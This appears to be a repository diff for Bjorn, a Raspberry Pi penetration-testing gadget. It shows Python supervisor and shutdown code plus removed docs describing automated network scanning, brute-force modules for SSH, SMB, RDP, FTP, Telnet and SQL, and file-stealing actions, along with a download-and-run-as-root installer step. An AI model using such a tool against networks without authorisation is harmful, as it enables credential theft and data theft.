self.shared_data.manual_mode = True
logger.info("Stop button pressed. Manual mode activated & Stopping Orchestrator...")
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.info("Stopping Orchestrator thread...")
with self._orch_lock:
thread = self.orchestrator_thread
if thread is None or not thread.is_alive():
self.orchestrator_thread = None
self.orchestrator = None
return
# Keep MANUAL sticky so supervisor does not auto-restart orchestration,
# but only if the current mode isn't already handling it.
# - MANUAL/BIFROST: already non-AUTO, no need to change
# - AUTO: let it be — orchestrator will restart naturally (e.g. after Bifrost auto-disable)
try:
current = self.shared_data.operation_mode
if current == "AI":
self.shared_data.operation_mode = "MANUAL"
except Exception:
pass
now = time.time()
if now - self._last_orch_stop_attempt >= 10.0:
logger.info("Stop requested: stopping Orchestrator")
self._last_orch_stop_attempt = now
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
self.shared_data.queue_event.set() # Wake up thread
thread.join(timeout=10.0)
def is_wifi_connected(self):
"""Checks for Wi-Fi connectivity using the nmcli command."""
result = subprocess.Popen(['nmcli', '-t', '-f', 'active', 'dev', 'wifi'], stdout=subprocess.PIPE, text=True).communicate()[0]
self.wifi_connected = 'yes' in result
return self.wifi_connected
if thread.is_alive():
logger.warning_throttled(
"Orchestrator thread did not stop gracefully",
key="orch_stop_not_graceful",
interval_s=20,
)
# Still reset status so UI doesn't stay stuck on the
# last action while the thread finishes in the background.
else:
self.orchestrator_thread = None
self.orchestrator = None
# Always reset display state regardless of whether join succeeded.
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
self.shared_data.update_status("IDLE", "")
def is_network_connected(self):
"""Checks for network connectivity with throttling and low-CPU checks."""
now = time.time()
# Throttling: Do not scan more than once every 10 seconds
if now - self._last_net_check < 10:
return self.network_connected
self._last_net_check = now
def interface_has_ip(interface_name):
try:
# OPTIMIZATION: Check /sys/class/net first to avoid spawning subprocess if interface doesn't exist
if not os.path.exists(f"/sys/class/net/{interface_name}"):
return False
# Check for IP address
result = subprocess.run(
["ip", "-4", "addr", "show", interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
timeout=2,
)
if result.returncode != 0:
return False
return "inet " in result.stdout
except Exception:
return False
eth_connected = interface_has_ip("eth0")
wifi_connected = interface_has_ip("wlan0")
self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected:
if self.network_connected:
logger.info(f"Network status changed: Connected (eth0={eth_connected}, wlan0={wifi_connected})")
else:
logger.warning("Network status changed: Connection lost")
self.previous_network_connected = self.network_connected
return self.network_connected
@staticmethod
def start_display():
"""Start the display thread"""
def start_display(old_display=None):
# Ensure the previous Display's controller is fully stopped to release frames
if old_display is not None:
try:
old_display.display_controller.stop(timeout=3.0)
except Exception:
pass
display = Display(shared_data)
display_thread = threading.Thread(target=display.run)
display_thread = threading.Thread(
target=display.run,
daemon=True,
name="DisplayMain",
)
display_thread.start()
return display_thread
return display_thread, display
def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
"""Handles the termination of the main, display, and web threads."""
def _request_shutdown():
"""Signals all threads to stop."""
shared_data.should_exit = True
shared_data.orchestrator_should_exit = True # Ensure orchestrator stops
shared_data.display_should_exit = True # Ensure display stops
shared_data.webapp_should_exit = True # Ensure web server stops
handle_exit_display(sig, frame, display_thread)
if display_thread.is_alive():
display_thread.join()
if bjorn_thread.is_alive():
bjorn_thread.join()
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0) # Used sys.exit(0) instead of exit(0)
shared_data.orchestrator_should_exit = True
shared_data.display_should_exit = True
shared_data.webapp_should_exit = True
shared_data.queue_event.set()
def handle_exit(
sig,
frame,
display_thread,
bjorn_thread,
web_thread_obj,
health_thread=None,
runtime_state_thread=None,
from_signal=False,
):
global _shutdown_started
with _shutdown_lock:
if _shutdown_started:
if from_signal:
logger.warning("Forcing exit (SIGINT/SIGTERM received twice)")
os._exit(130)
return
_shutdown_started = True
logger.info(f"Shutdown signal received: {sig}")
_request_shutdown()
# 1. Stop Display (handles EPD cleanup)
try:
handle_exit_display(sig, frame, display_thread)
except Exception:
pass
# 2. Stop Health Monitor
try:
if health_thread and hasattr(health_thread, "stop"):
health_thread.stop()
except Exception:
pass
# 2b. Stop Runtime State Updater
try:
if runtime_state_thread and hasattr(runtime_state_thread, "stop"):
runtime_state_thread.stop()
except Exception:
pass
# 2c. Stop Sentinel Watchdog
try:
engine = getattr(shared_data, 'sentinel_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 2d. Stop Bifrost Engine
try:
engine = getattr(shared_data, 'bifrost_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
web_thread_obj.shutdown()
except Exception:
pass
# 4. Join all threads
for thread in (display_thread, bjorn_thread, web_thread_obj, health_thread, runtime_state_thread):
try:
if thread and thread.is_alive():
thread.join(timeout=5.0)
except Exception:
pass
# 5. Close Database (Prevent corruption)
try:
if hasattr(shared_data, "db") and hasattr(shared_data.db, "close"):
shared_data.db.close()
except Exception as exc:
logger.error(f"Database shutdown error: {exc}")
logger.info("Bjorn stopped. Clean exit.")
_release_instance_lock()
if from_signal:
sys.exit(0)
def _install_thread_excepthook():
def _hook(args):
logger.error(f"Unhandled thread exception: {args.thread.name} - {args.exc_type.__name__}: {args.exc_value}")
# We don't force shutdown here to avoid killing the app on minor thread glitches,
# unless it's critical. The Crash Shield will handle restarts.
threading.excepthook = _hook
if __name__ == "__main__":
logger.info("Starting threads")
if not _acquire_instance_lock():
sys.exit(1)
atexit.register(_release_instance_lock)
_install_thread_excepthook()
display_thread = None
display_instance = None
bjorn_thread = None
health_thread = None
runtime_state_thread = None
last_gc_time = time.time()
try:
logger.info("Loading shared data config...")
logger.info("Bjorn Startup: Loading config...")
shared_data.load_config()
logger.info("Starting display thread...")
shared_data.display_should_exit = False # Initialize display should_exit
display_thread = Bjorn.start_display()
logger.info("Starting Runtime State Updater...")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
logger.info("Starting Bjorn thread...")
logger.info("Starting Display...")
shared_data.display_should_exit = False
display_thread, display_instance = Bjorn.start_display()
logger.info("Starting Bjorn Core...")
bjorn = Bjorn(shared_data)
shared_data.bjorn_instance = bjorn # Assigner l'instance de Bjorn à shared_data
bjorn_thread = threading.Thread(target=bjorn.run)
shared_data.bjorn_instance = bjorn
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
if shared_data.config["websrv"]:
logger.info("Starting the web server...")
web_thread.start()
if shared_data.config.get("websrv", False):
logger.info("Starting Web Server...")
if not web_thread.is_alive():
web_thread.start()
signal.signal(signal.SIGINT, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
signal.signal(signal.SIGTERM, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
health_interval = int(shared_data.config.get("health_log_interval", 60))
health_thread = HealthMonitor(shared_data, interval_s=health_interval)
health_thread.start()
except Exception as e:
logger.error(f"An exception occurred during thread start: {e}")
handle_exit_display(signal.SIGINT, None)
exit(1)
# Sentinel watchdog — start if enabled in config
try:
from sentinel import SentinelEngine
sentinel_engine = SentinelEngine(shared_data)
shared_data.sentinel_engine = sentinel_engine
if shared_data.config.get("sentinel_enabled", False):
sentinel_engine.start()
logger.info("Sentinel watchdog started")
else:
logger.info("Sentinel watchdog loaded (disabled)")
except Exception as e:
logger.warning("Sentinel init skipped: %s", e)
# Bifrost engine — start if enabled in config
try:
from bifrost import BifrostEngine
bifrost_engine = BifrostEngine(shared_data)
shared_data.bifrost_engine = bifrost_engine
if shared_data.config.get("bifrost_enabled", False):
bifrost_engine.start()
logger.info("Bifrost engine started")
else:
logger.info("Bifrost engine loaded (disabled)")
except Exception as e:
logger.warning("Bifrost init skipped: %s", e)
# Loki engine — start if enabled in config
try:
from loki import LokiEngine
loki_engine = LokiEngine(shared_data)
shared_data.loki_engine = loki_engine
if shared_data.config.get("loki_enabled", False):
loki_engine.start()
logger.info("Loki engine started")
else:
logger.info("Loki engine loaded (disabled)")
except Exception as e:
logger.warning("Loki init skipped: %s", e)
# Signal Handlers
exit_handler = lambda s, f: handle_exit(
s,
f,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
True,
)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
# --- SUPERVISOR LOOP (Crash Shield) ---
restart_times = []
max_restarts = 5
restart_window_s = 300
logger.info("Bjorn Supervisor running.")
while not shared_data.should_exit:
time.sleep(2) # CPU Friendly polling
now = time.time()
# --- OPTIMIZATION: Periodic Garbage Collection ---
# Forces cleanup of circular references and free RAM every 2 mins
if now - last_gc_time > 120:
gc.collect()
last_gc_time = now
logger.debug("System: Forced Garbage Collection executed.")
# --- CRASH SHIELD: Bjorn Thread ---
if bjorn_thread and not bjorn_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Bjorn Main Thread")
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
else:
logger.critical("Crash Shield: Bjorn exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Display Thread ---
if display_thread and not display_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Display Thread")
display_thread, display_instance = Bjorn.start_display(old_display=display_instance)
else:
logger.critical("Crash Shield: Display exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Runtime State Updater ---
if runtime_state_thread and not runtime_state_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Runtime State Updater")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
else:
logger.critical("Crash Shield: Runtime State Updater exceeded restart budget. Shutting down.")
_request_shutdown()
break
# Exit cleanup
if health_thread:
health_thread.stop()
if runtime_state_thread:
runtime_state_thread.stop()
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except Exception as exc:
logger.critical(f"Critical bootstrap failure: {exc}")
_request_shutdown()
# Try to clean up anyway
try:
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except:
pass
sys.exit(1)

View File

@@ -1,40 +0,0 @@
# 📝 Code of Conduct
Take Note About This... **Take Note...**
## 🤝 Our Commitment
We are committed to fostering an open and welcoming environment for all contributors. As such, everyone who participates in **Bjorn** is expected to adhere to the following code of conduct.
## 🌟 Expected Behavior
- **Respect:** Be respectful of differing viewpoints and experiences.
- **Constructive Feedback:** Provide constructive feedback and be open to receiving it.
- **Empathy and Kindness:** Show empathy and kindness towards other contributors.
- **Respect for Maintainers:** Respect the decisions of the maintainers.
- **Positive Intent:** Assume positive intent in interactions with others.
## 🚫 Unacceptable Behavior
- **Harassment or Discrimination:** Harassment or discrimination in any form.
- **Inappropriate Language or Imagery:** Use of inappropriate language or imagery.
- **Personal Attacks:** Personal attacks or insults.
- **Public or Private Harassment:** Public or private harassment.
## 📢 Reporting Misconduct
If you encounter any behavior that violates this code of conduct, please report it by contacting [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com). All complaints will be reviewed and handled appropriately.
## ⚖️ Enforcement
Instances of unacceptable behavior may be addressed by the project maintainers, who are responsible for clarifying and enforcing this code of conduct. Violations may result in temporary or permanent bans from the project and related spaces.
## 🙏 Acknowledgments
This code of conduct is adapted from the [Contributor Covenant, version 2.0](https://www.contributor-covenant.org/version/2/0/code_of_conduct.html).
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,51 +0,0 @@
# 🤝 Contributing to Bjorn
We welcome contributions to Bjorn! To make sure the process goes smoothly, please follow these guidelines:
## 📋 Code of Conduct
Please note that all participants in our project are expected to follow our [Code of Conduct](#-code-of-conduct). Make sure to review it before contributing.
## 🛠 How to Contribute
1. **Fork the repository**:
Fork the project to your GitHub account using the GitHub interface.
2. **Create a new branch**:
Use a descriptive branch name for your feature or bugfix:
git checkout -b feature/your-feature-name
3. **Make your changes**:
Implement your feature or fix the bug in your branch. Make sure to include tests where applicable and follow coding standards.
4. **Test your changes**:
Run the test suite to ensure your changes dont break any functionality:
- ...
5. **Commit your changes**:
Use meaningful commit messages that explain what you have done:
git commit -m "Add feature/fix: Description of changes"
6. **Push your changes**:
Push your changes to your fork:
git push origin feature/your-feature-name
7. **Submit a Pull Request**:
Create a pull request on the main repository, detailing the changes youve made. Link any issues your changes resolve and provide context.
## 📑 Guidelines for Contributions
- **Lint your code** before submitting a pull request. We use [ESLint](https://eslint.org/) for frontend and [pylint](https://www.pylint.org/) for backend linting.
- Ensure **test coverage** for your code. Uncovered code may delay the approval process.
- Write clear, concise **commit messages**.
Thank you for helping improve!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,373 +0,0 @@
# 🖲️ Bjorn Development
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Design](#-design)
- [Educational Aspects](#-educational-aspects)
- [Disclaimer](#-disclaimer)
- [Extensibility](#-extensibility)
- [Development Status](#-development-status)
- [Project Structure](#-project-structure)
- [Core Files](#-core-files)
- [Actions](#-actions)
- [Data Structure](#-data-structure)
- [Detailed Project Description](#-detailed-project-description)
- [Behaviour of Bjorn](#-behavior-of-bjorn)
- [Running Bjorn](#-running-bjorn)
- [Manual Start](#-manual-start)
- [Service Control](#-service-control)
- [Fresh Start](#-fresh-start)
- [Important Configuration Files](#-important-configuration-files)
- [Shared Configuration](#-shared-configuration-shared_configjson)
- [Actions Configuration](#-actions-configuration-actionsjson)
- [E-Paper Display Support](#-e-paper-display-support)
- [Ghosting Removed](#-ghosting-removed)
- [Development Guidelines](#-development-guidelines)
- [Adding New Actions](#-adding-new-actions)
- [Testing](#-testing)
- [Web Interface](#-web-interface)
- [Project Roadmap](#-project-roadmap)
- [Current Focus](#-future-plans)
- [Future Plans](#-future-plans)
- [License](#-license)
## 🎨 Design
- **Portability**: Self-contained and portable device, ideal for penetration testing.
- **Modularity**: Extensible architecture allowing addition of new actions.
- **Visual Interface**: The e-Paper HAT provides a visual interface for monitoring the ongoing actions, displaying results or stats, and interacting with Bjorn .
## 📔 Educational Aspects
- **Learning Tool**: Designed as an educational tool to understand cybersecurity concepts and penetration testing techniques.
- **Practical Experience**: Provides a practical means for students and professionals to familiarize themselves with network security practices and vulnerability assessment tools.
## ✒️ Disclaimer
- **Ethical Use**: This project is strictly for educational purposes.
- **Responsibility**: The author and contributors disclaim any responsibility for misuse of Bjorn.
- **Legal Compliance**: Unauthorized use of this tool for malicious activities is prohibited and may be prosecuted by law.
## 🧩 Extensibility
- **Evolution**: The main purpose of Bjorn is to gain new actions and extend his arsenal over time.
- **Modularity**: Actions are designed to be modular and can be easily extended or modified to add new functionality.
- **Possibilities**: From capturing pcap files to cracking hashes, man-in-the-middle attacks, and more—the possibilities are endless.
- **Contribution**: It's up to the user to develop new actions and add them to the project.
## 🔦 Development Status
- **Project Status**: Ongoing development.
- **Current Version**: Scripted auto-installer, or manual installation. Not yet packaged with Raspberry Pi OS.
- **Reason**: The project is still in an early stage, requiring further development and debugging.
### 🗂️ Project Structure
```
Bjorn/
├── Bjorn.py
├── comment.py
├── display.py
├── epd_helper.py
├── init_shared.py
├── kill_port_8000.sh
├── logger.py
├── orchestrator.py
├── requirements.txt
├── shared.py
├── utils.py
├── webapp.py
├── __init__.py
├── actions/
│ ├── ftp_connector.py
│ ├── ssh_connector.py
│ ├── smb_connector.py
│ ├── rdp_connector.py
│ ├── telnet_connector.py
│ ├── sql_connector.py
│ ├── steal_files_ftp.py
│ ├── steal_files_ssh.py
│ ├── steal_files_smb.py
│ ├── steal_files_rdp.py
│ ├── steal_files_telnet.py
│ ├── steal_data_sql.py
│ ├── nmap_vuln_scanner.py
│ ├── scanning.py
│ └── __init__.py
├── backup/
│ ├── backups/
│ └── uploads/
├── config/
├── data/
│ ├── input/
│ │ └── dictionary/
│ ├── logs/
│ └── output/
│ ├── crackedpwd/
│ ├── data_stolen/
│ ├── scan_results/
│ ├── vulnerabilities/
│ └── zombies/
└── resources/
└── waveshare_epd/
```
### ⚓ Core Files
#### Bjorn.py
The main entry point for the application. It initializes and runs the main components, including the network scanner, orchestrator, display, and web server.
#### comment.py
Handles generating all the Bjorn comments displayed on the e-Paper HAT based on different themes/actions and statuses.
#### display.py
Manages the e-Paper HAT display, updating the screen with Bjorn character, the dialog/comments, and the current information such as network status, vulnerabilities, and various statistics.
#### epd_helper.py
Handles the low-level interactions with the e-Paper display hardware.
#### logger.py
Defines a custom logger with specific formatting and handlers for console and file logging. It also includes a custom log level for success messages.
#### orchestrator.py
Bjorns AI, a heuristic engine that orchestrates the different actions such as network scanning, vulnerability scanning, attacks, and file stealing. It loads and executes actions based on the configuration and sets the status of the actions and Bjorn.
#### shared.py
Defines the `SharedData` class that holds configuration settings, paths, and methods for updating and managing shared data across different modules.
#### init_shared.py
Initializes shared data that is used across different modules. It loads the configuration and sets up necessary paths and variables.
#### utils.py
Contains utility functions used throughout the project.
#### webapp.py
Sets up and runs a web server to provide a web interface for changing settings, monitoring and interacting with Bjorn.
### ▶️ Actions
#### actions/scanning.py
Conducts network scanning to identify live hosts and open ports. It updates the network knowledge base (`netkb`) and generates scan results.
#### actions/nmap_vuln_scanner.py
Performs vulnerability scanning using Nmap. It parses the results and updates the vulnerability summary for each host.
#### Protocol Connectors
- **ftp_connector.py**: Brute-force attacks on FTP services.
- **ssh_connector.py**: Brute-force attacks on SSH services.
- **smb_connector.py**: Brute-force attacks on SMB services.
- **rdp_connector.py**: Brute-force attacks on RDP services.
- **telnet_connector.py**: Brute-force attacks on Telnet services.
- **sql_connector.py**: Brute-force attacks on SQL services.
#### File Stealing Modules
- **steal_files_ftp.py**: Steals files from FTP servers.
- **steal_files_smb.py**: Steals files from SMB shares.
- **steal_files_ssh.py**: Steals files from SSH servers.
- **steal_files_telnet.py**: Steals files from Telnet servers.
- **steal_data_sql.py**: Extracts data from SQL databases.
### 📇 Data Structure
#### Network Knowledge Base (netkb.csv)
Located at `data/netkb.csv`. Stores information about:
- Known hosts and their status. (Alive or offline)
- Open ports and vulnerabilities.
- Action execution history. (Success or failed)
**Preview Example:**
![netkb1](https://github.com/infinition/Bjorn/assets/37984399/f641a565-2765-4280-a7d7-5b25c30dcea5)
![netkb2](https://github.com/infinition/Bjorn/assets/37984399/f08114a2-d7d1-4f50-b1c4-a9939ba66056)
#### Scan Results
Located in `data/output/scan_results/`.
This file is generated everytime the network is scanned. It is used to consolidate the data and update netkb.
**Example:**
![Scan result](https://github.com/infinition/Bjorn/assets/37984399/eb4a313a-f90c-4c43-b699-3678271886dc)
#### Live Status (livestatus.csv)
Contains real-time information displayed on the e-Paper HAT:
- Total number of known hosts.
- Currently alive hosts.
- Open ports count.
- Other runtime statistics.
## 📖 Detailed Project Description
### 👀 Behavior of Bjorn
Once launched, Bjorn performs the following steps:
1. **Initialization**: Loads configuration, initializes shared data, and sets up necessary components such as the e-Paper HAT display.
2. **Network Scanning**: Scans the network to identify live hosts and open ports. Updates the network knowledge base (`netkb`) with the results.
3. **Orchestration**: Orchestrates different actions based on the configuration and network knowledge base. This includes performing vulnerability scanning, attacks, and file stealing.
4. **Vulnerability Scanning**: Performs vulnerability scans on identified hosts and updates the vulnerability summary.
5. **Brute-Force Attacks and File Stealing**: Starts brute-force attacks and steals files based on the configuration criteria.
6. **Display Updates**: Continuously updates the e-Paper HAT display with current information such as network status, vulnerabilities, and various statistics. Bjorn also displays random comments based on different themes and statuses.
7. **Web Server**: Provides a web interface for monitoring and interacting with Bjorn.
## ▶️ Running Bjorn
### 📗 Manual Start
To manually start Bjorn (without the service, ensure the service is stopped « sudo systemctl stop bjorn.service »):
```bash
cd /home/bjorn/Bjorn
# Run Bjorn
sudo python Bjorn.py
```
### 🕹️ Service Control
Control the Bjorn service:
```bash
# Start Bjorn
sudo systemctl start bjorn.service
# Stop Bjorn
sudo systemctl stop bjorn.service
# Check status
sudo systemctl status bjorn.service
# View logs
sudo journalctl -u bjorn.service
```
### 🪄 Fresh Start
To reset Bjorn to a clean state:
```bash
sudo rm -rf /home/bjorn/Bjorn/config/*.json \
/home/bjorn/Bjorn/data/*.csv \
/home/bjorn/Bjorn/data/*.log \
/home/bjorn/Bjorn/data/output/data_stolen/* \
/home/bjorn/Bjorn/data/output/crackedpwd/* \
/home/bjorn/Bjorn/config/* \
/home/bjorn/Bjorn/data/output/scan_results/* \
/home/bjorn/Bjorn/__pycache__ \
/home/bjorn/Bjorn/config/__pycache__ \
/home/bjorn/Bjorn/data/__pycache__ \
/home/bjorn/Bjorn/actions/__pycache__ \
/home/bjorn/Bjorn/resources/__pycache__ \
/home/bjorn/Bjorn/web/__pycache__ \
/home/bjorn/Bjorn/*.log \
/home/bjorn/Bjorn/resources/waveshare_epd/__pycache__ \
/home/bjorn/Bjorn/data/logs/* \
/home/bjorn/Bjorn/data/output/vulnerabilities/* \
/home/bjorn/Bjorn/data/logs/*
```
Everything will be recreated automatically at the next launch of Bjorn.
## ❇️ Important Configuration Files
### 🔗 Shared Configuration (`shared_config.json`)
Defines various settings for Bjorn, including:
- Boolean settings (`manual_mode`, `websrv`, `debug_mode`, etc.).
- Time intervals and delays.
- Network settings.
- Port lists and blacklists.
These settings are accessible on the webpage.
### 🛠️ Actions Configuration (`actions.json`)
Lists the actions to be performed by Bjorn, including (dynamically generated with the content of the folder):
- Module and class definitions.
- Port assignments.
- Parent-child relationships.
- Action status definitions.
## 📟 E-Paper Display Support
Currently, hardcoded for the 2.13-inch V2 & V4 e-Paper HAT.
My program automatically detect the screen model and adapt the python expressions into my code.
For other versions:
- As I don't have the v1 and v3 to validate my algorithm, I just hope it will work properly.
### 🍾 Ghosting Removed!
In my journey to make Bjorn work with the different screen versions, I struggled, hacking several parameters and found out that it was possible to remove the ghosting of screens! I let you see this, I think this method will be very useful for all other projects with the e-paper screen!
## ✍️ Development Guidelines
### Adding New Actions
1. Create a new action file in `actions/`.
2. Implement required methods:
- `__init__(self, shared_data)`
- `execute(self, ip, port, row, status_key)`
3. Add the action to `actions.json`.
4. Follow existing action patterns.
### 🧪 Testing
1. Create a test environment.
2. Use an isolated network.
3. Follow ethical guidelines.
4. Document test cases.
## 💻 Web Interface
- **Access**: `http://[device-ip]:8000`
- **Features**:
- Real-time monitoring with a console.
- Configuration management.
- Viewing results. (Credentials and files)
- System control.
## 🧭 Project Roadmap
### 🪛 Current Focus
- Stability improvements.
- Bug fixes.
- Service reliability.
- Documentation updates.
### 🧷 Future Plans
- Additional attack modules.
- Enhanced reporting.
- Improved user interface.
- Extended protocol support.
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,468 +0,0 @@
## 🔧 Installation and Configuration
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Prerequisites](#-prerequisites)
- [Quick Install](#-quick-install)
- [Manual Install](#-manual-install)
- [License](#-license)
Use Raspberry Pi Imager to install your OS
https://www.raspberrypi.com/software/
### 📌 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📌 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the raspberry pi zero w2 64bits, but several feedbacks have attested that the installation worked perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment the paper screen v2 v4 have been tested and implemented.
I juste hope the V1 & V3 will work the same.
### ⚡ Quick Install
The fastest way to install Bjorn is using the automatic installation script :
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh
sudo ./install_bjorn.sh
# Choose the choice 1 for automatic installation. It may take a while as a lot of packages and modules will be installed. You must reboot at the end.
```
### 🧰 Manual Install
#### Step 1: Activate SPI & I2C
```bash
sudo raspi-config
```
- Navigate to **"Interface Options"**.
- Enable **SPI**.
- Enable **I2C**.
#### Step 2: System Dependencies
```bash
# Update system
sudo apt-get update && sudo apt-get upgrade -y
# Install required packages
sudo apt install -y \
libjpeg-dev \
zlib1g-dev \
libpng-dev \
python3-dev \
libffi-dev \
libssl-dev \
libgpiod-dev \
libi2c-dev \
libatlas-base-dev \
build-essential \
python3-pip \
wget \
lsof \
git \
libopenjp2-7 \
nmap \
libopenblas-dev \
bluez-tools \
bluez \
dhcpcd5 \
bridge-utils \
python3-pil
# Update Nmap scripts database
sudo nmap --script-updatedb
```
#### Step 3: Bjorn Installation
```bash
# Clone the Bjorn repository
cd /home/bjorn
git clone https://github.com/infinition/Bjorn.git
cd Bjorn
# Install Python dependencies within the virtual environment
sudo pip install -r requirements.txt --break-system-packages
# As i did not succeed "for now" to get a stable installation with a virtual environment, i installed the dependencies system wide (with --break-system-packages), it did not cause any issue so far. You can try to install them in a virtual environment if you want.
```
##### 3.1: Configure E-Paper Display Type
Choose your e-Paper HAT version by modifying the configuration file:
1. Open the configuration file:
```bash
sudo vi /home/bjorn/Bjorn/config/shared_config.json
```
Press i to enter insert mode
Locate the line containing "epd_type":
Change the value according to your screen model:
- For 2.13 V1: "epd_type": "epd2in13",
- For 2.13 V2: "epd_type": "epd2in13_V2",
- For 2.13 V3: "epd_type": "epd2in13_V3",
- For 2.13 V4: "epd_type": "epd2in13_V4",
Press Esc to exit insert mode
Type :wq and press Enter to save and quit
#### Step 4: Configure File Descriptor Limits
To prevent `OSError: [Errno 24] Too many open files`, it's essential to increase the file descriptor limits.
##### 4.1: Modify File Descriptor Limits for All Users
Edit `/etc/security/limits.conf`:
```bash
sudo vi /etc/security/limits.conf
```
Add the following lines:
```
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
```
##### 4.2: Configure Systemd Limits
Edit `/etc/systemd/system.conf`:
```bash
sudo vi /etc/systemd/system.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
Edit `/etc/systemd/user.conf`:
```bash
sudo vi /etc/systemd/user.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
##### 4.3: Create or Modify `/etc/security/limits.d/90-nofile.conf`
```bash
sudo vi /etc/security/limits.d/90-nofile.conf
```
Add:
```
root soft nofile 65535
root hard nofile 65535
```
##### 4.4: Adjust the System-wide File Descriptor Limit
Edit `/etc/sysctl.conf`:
```bash
sudo vi /etc/sysctl.conf
```
Add:
```
fs.file-max = 2097152
```
Apply the changes:
```bash
sudo sysctl -p
```
#### Step 5: Reload Systemd and Apply Changes
Reload systemd to apply the new file descriptor limits:
```bash
sudo systemctl daemon-reload
```
#### Step 6: Modify PAM Configuration Files
PAM (Pluggable Authentication Modules) manages how limits are enforced for user sessions. To ensure that the new file descriptor limits are respected, update the following configuration files.
##### Step 6.1: Edit `/etc/pam.d/common-session` and `/etc/pam.d/common-session-noninteractive`
```bash
sudo vi /etc/pam.d/common-session
sudo vi /etc/pam.d/common-session-noninteractive
```
Add this line at the end of both files:
```
session required pam_limits.so
```
This ensures that the limits set in `/etc/security/limits.conf` are enforced for all user sessions.
#### Step 7: Configure Services
##### 7.1: Bjorn Service
Create the service file:
```bash
sudo vi /etc/systemd/system/bjorn.service
```
Add the following content:
```ini
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
# Check open files and restart if it reached the limit (ulimit -n buffer of 1000)
